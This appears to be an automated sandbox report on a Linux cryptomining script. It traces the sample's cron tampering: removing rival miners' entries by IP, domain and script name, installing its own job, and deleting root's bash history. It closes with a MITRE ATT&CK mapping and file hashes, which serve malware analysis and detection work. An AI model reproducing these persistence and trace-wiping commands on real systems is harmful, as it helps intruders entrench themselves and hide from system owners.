/bin/sedsed /aliyun.one/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /3.215.110.66.one/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /pastebin/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /onion/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /lsd.systemten.org/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /shuf/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /ash/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /mr.sh/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /185.181.10.234/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /localhost.xyz/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /45.137.151.106/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /111.90.159.106/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /github/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /bigd1ck.com/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /185.181.10.234/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /146.71.79.230/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /122.51.164.83/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /newdat.sh/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /lib.pygensim.com/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /t.amynx.com/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /update.sh/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /systemd-service.sh/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /pg_stat.sh/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /sleep/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /oka/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /linux1213/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed "/#wget/d"2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed "/#curl/d"2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /zsvc/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /givemexyz/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /world/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /1.sh/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /3.sh/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /workers/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /oracleservice/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep -e 185.191.32.1982⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/bin/rmrm -rf /root/.bash_history2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Impair Defenses
1Disable or Modify System Firewall
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
193B
MD5a3e1220eacdbd3fa5d0117efd5d4dd91
SHA1b66492d74a517bcd9d230b574b56411476124709
SHA25605d02411668f4ebd576a24ac61cc84e617bdb66aa819581daa670c65f1a876f0
SHA51278d27f45518a7fce636ef790ee215b1f47b2939e02cf6c5118897a703cc15ed4c283838d30a275e309304415d2a58e2e4a07d99127ec9ff32221d94e6547ca1f
-
Filesize
175B
MD53b7a97e0bf2161c729cdec55c42e47d4
SHA1e6a11e30f26c50216b41f9c2278f1d5783dd63f7
SHA2565105db876f9883d34669f0016b3d79a7559b44cfb68d20069e8389c63b544482
SHA512dc5774e2c073298103f9349ee5e5e8b6825d3f837a01b7d7e19a70e9ec5418ab3fe80c6853ac2b8e253b3eb34ee1c6428ca6892324c3fe49bedc571a687f8444
-
Filesize
250B
MD53e4a939ff67403774c78185c07dfdc39
SHA1d891cc8e620a54254902657f03e6a41046d3a93c
SHA2564260ccaad5496d8697812a8d38a38d97dfa4caff8a607784a9a34c71a98d96fe
SHA51283b82b270310ae3ff3e30a0441aad1f4828fa794d0085f88fa4f996fc1e80e2559f496483773043f248a969b1efbac0d7b63bb9525c636d29c7a81676a3df487
-
Filesize
175B
MD56fb5ee24078c51509bf4240e6ac9e988
SHA1cfc5592a72c38f5f0694f5fadb2c3f375ea720e0
SHA25645c7c6700b7e84068b369190405d45806fdb8c0d8ae165f28d56733f373a444e
SHA512eff2f48705b4146c471a67f5b412bafe836996f186a3a5ef77f265af24f06c7ef0e55f89e6cbadb5c0592c11c61996693f7fee9b5eed3619e5c2e6a2c62e0b26